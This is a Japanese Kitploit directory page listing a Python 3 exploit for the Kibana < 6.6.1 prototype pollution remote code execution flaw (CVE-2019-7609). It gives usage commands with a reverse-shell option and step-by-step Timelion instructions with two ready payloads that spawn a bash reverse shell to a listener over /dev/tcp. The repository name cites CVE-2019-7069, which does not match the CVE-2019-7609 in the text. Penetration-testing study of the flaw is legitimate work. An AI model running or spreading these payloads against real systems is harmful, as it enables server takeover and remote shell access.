Skip to content
KitploitKITPLOIT
ツールブログ
Log in
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2019-7069-POC — Kibana < 6.6.1 RCE (CVE-2019-7609) の Python 3 エクスプロイト。プロトタイプ汚染を介し、自動バージョン検出とオプションのリバースシェルを備えています。 | Kitploit
ツール/GitHubGitHub/caelumisme/cve-2019-7069-poc
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育ペイロード開発
GitHubcaelumisme/cve-2019-7069-poc

CVE-2019-7069-POC

Kibana < 6.6.1 RCE (CVE-2019-7609) の Python 3 エクスプロイト。プロトタイプ汚染を介し、自動バージョン検出とオプションのリバースシェルを備えています。

リポジトリを見る
111ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

Kibana < 6.6.1 リモートコード実行エクスプロイト (CVE-2019-7609)

Exploit Banner

🚨 教育目的のRCEエクスプロイト 🚨

作者: LandGrey (Python3リファクタリング: [Your Name])
参照: Exploit-DB 46651
CVE: CVE-2019-7609


⚠️ 免責事項:
このスクリプトは教育目的および許可された侵入テストのみを対象としています。所有していない、または明示的なテスト許可がないシステムで使用しないでください。作者および貢献者は、このツールの誤用や損害について一切責任を負いません。


🎯 これは何ですか?

これは、Kibanaバージョン < 6.6.1 の リモートコード実行脆弱性 に対するPython 3エクスプロイトスクリプトです。プロトタイプ汚染の欠陥を利用して、脆弱なKibanaインスタンス上で任意のコマンドを実行し、リバースシェルを起動することも可能です。

🕹️ 特徴

  • Kibanaのバージョンを自動検出
  • 脆弱性の状態を確認
  • オプションでリスナーへのリバースシェルを起動
  • クリーンでインタラクティブな端末出力
  • 完全にPython 3互換

📚 参照

  • Exploit-DB Entry 46651
  • Kibana Official Site
  • CVE-2019-7609

🚀 使用方法

python3 kibana_exploit.py -u http://target-kibana:5601

リバースシェルを起動するには:

python3 kibana_exploit.py -u http://target-kibana:5601 --shell -host YOUR_IP -port LISTENER_PORT

例

python3 kibana_exploit.py -u http://10.10.10.100:5601 --shell -host 10.10.10.200 -port 4444

🛠️ 必要条件

  • Python 3.x
  • requests ライブラリ
  • packaging ライブラリ

依存関係のインストール:

pip install requests packaging

💡 Timelionを使用した手動エクスプロイト

KibanaのTimelionビジュアライザーを使用して、この脆弱性を手動で悪用することもできます:

  1. Kibanaを開く
  2. 以下のペイロードのいずれかをTimelionビジュアライザーに貼り付ける
  3. Runをクリック
  4. 左パネルでCanvasをクリック
  5. リバースシェルがポップアップします! :)

ペイロード作成者: securityMB

.es(*).props(label.__proto__.env.AAAA='require("child_process").exec("bash -i >& /dev/tcp/192.168.1.100/4444 0>&1");process.exit()//')
.props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ')

ペイロード作成者: chybeta

.es(*).props(label.__proto__.env.AAAA='require("child_process").exec("bash -c \\'bash -i>& /dev/tcp/192.168.1.100/4444 0>&1\\'");process.exit()//')
.props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ')

192.168.1.100 と 4444 を自分のリスナーのIPとポートに置き換えてください。


🧩 動作の仕組み

  • HTTPリクエストでKibanaのバージョンを検出
  • ターゲットがCVE-2019-7609に対して脆弱か確認
  • プロトタイプ汚染を利用して任意のコマンドを実行
  • オプションで指定したホストとポートにリバースシェルを生成

🎨 出力

このスクリプトは、検出、確認、エクスプロイトの各段階で明確でステップバイステップの出力を提供し、追跡が容易で楽しく使用できます!


👾 楽しみと学習のために

このスクリプトは、プロトタイプ汚染、リモートコード実行、侵入テスト技術を学ぶのに最適な方法です。責任を持って、常に許可を得て使用してください!


📝 ライセンス

このプロジェクトは教育目的のみです。保証はありません。倫理的にハッキングし、好奇心を持ち続け、楽しんでください!

ツールをダウンロード